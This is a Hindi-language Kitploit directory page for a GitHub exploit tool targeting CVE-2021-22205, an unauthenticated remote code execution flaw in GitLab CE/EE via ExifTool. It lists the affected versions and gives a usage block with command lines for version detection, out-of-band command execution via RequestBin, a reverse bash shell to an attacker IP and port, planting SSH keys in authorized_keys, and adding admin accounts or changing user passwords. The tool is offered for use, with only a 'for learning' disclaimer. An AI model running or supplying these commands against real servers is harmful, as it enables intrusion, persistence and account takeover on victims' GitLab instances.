Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-22205 — ExifTool का उपयोग करके GitLab CE/EE प्री-ऑथ RCE | Kitploit
उपकरण/GitHubGitHub/inspiringz/cve-2021-22205
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलArchived
GitHubinspiringz/cve-2021-22205

CVE-2021-22205

ExifTool का उपयोग करके GitLab CE/EE प्री-ऑथ RCE

रिपॉजिटरी देखें
237414 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-22205

GitLab CE/EE प्रीऑथ RCE ExifTool का उपयोग करके

यह परियोजना केवल सीखने के लिए है, यदि किसी के अधिकारों का उल्लंघन हुआ है, तो कृपया मुझसे संपर्क करें ताकि मैं परियोजना को हटा सकूं, और अंत में इसका गैरकानूनी उपयोग न करें यदि आप इस उपकरण का उपयोग करने की प्रक्रिया में कोई गैरकानूनी व्यवहार करते हैं, तो आप सभी परिणाम स्वयं वहन करेंगे। इस उपकरण के सभी डेवलपर्स और सभी योगदानकर्ता किसी भी कानूनी और संयुक्त देयता का वहन नहीं करते हैं।

विवरण

GitLab CE/EE में एक मुद्दा पाया गया है जो संस्करण 11.9 से शुरू होने वाले सभी संस्करणों को प्रभावित करता है। GitLab एक फ़ाइल पार्सर को दी गई इमेज फ़ाइलों का सही ढंग से मान्य नहीं कर रहा था, जिसके परिणामस्वरूप एक रिमोट कमांड निष्पादन हुआ।

प्रभावित संस्करण:

  • >=11.9, <13.8.8
  • >=13.9, <13.9.6
  • >=13.10, <13.10.3

विशेषताएं

  • Webpack manifest.json में हैश के माध्यम से Gitlab संस्करण पहचान
  • DNSLog और PostBin RequestBin के साथ स्वचालित आउट-ऑफ-बैंड इंटरैक्शन
  • रिवर्स बैश शेल / authorized_keys में SSH कुंजी जोड़ने का समर्थन
  • GitLab उपयोगकर्ता पासवर्ड को संशोधित और पुनर्स्थापित करने के लिए ENTER का समर्थन

उपयोग

root@kitploit:~
🐚 ››› python CVE-2021-22205.py

      ░░░░▐▐░░░  CVE-2021-22205
 ▐  ░░░░░▄██▄▄  GitLab CE/EE Unauthenticated RCE using ExifTool
  ▀▀██████▀░░  Affecting all versions starting from 11.9
  ░░▐▐░░▐▐░░  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 ▒▒▒▐▐▒▒▐▐▒  github.com/inspiringz/CVE-2021-22205

Usage:
    python3 CVE-2021-22205.py -u site_url -m detect        # gitlab version & vuln detect
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # rce (echo via requestbin oob) 
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # rce (echo via write file) *
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # reverse bash shell
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # append ssh authorized_keys
    python3 CVE-2021-22205.py -u site_url -m add user pass # add manager account *
    python3 CVE-2021-22205.py -u site_url -m mod user      # modify specified user's password => P4ss@GitLab
    python3 CVE-2021-22205.py -u site_url -m rec user      # restore specified user's original password
  • site_url पैरामीटर प्रारूप: http[s]://<domain|ip>[:port]/, जैसे: https://example.com:9000/
  • * द्वारा चिह्नित विधियाँ (rce2, add) अस्थिर हैं, काम नहीं कर सकती हैं :(
  • आप स्क्रिप्ट की सामग्री को वास्तविक वातावरण के अनुसार संशोधित कर सकते हैं

स्क्रीनशॉट

पता लगाना:

image-20220116233646585

RCE (RequestBin OOB के माध्यम से इको):

image-20220116234003576

रिवर्स बैश शेल:

image-20211111131442470

authorized_keys में SSH कुंजी जोड़ें:

image-20211111133555010

GitLab उपयोगकर्ता पासवर्ड संशोधन और पुनर्स्थापना:

image-20211111132115090

संदर्भ

  • https://github.com/projectdiscovery/nuclei-templates/blob/637eec3efac6eb384742c7aaa4e7d14f3392ede9/cves/2021/CVE-2021-22205.yaml
  • https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
  • https://github.com/righel/gitlab-version-nse
टूल डाउनलोड करें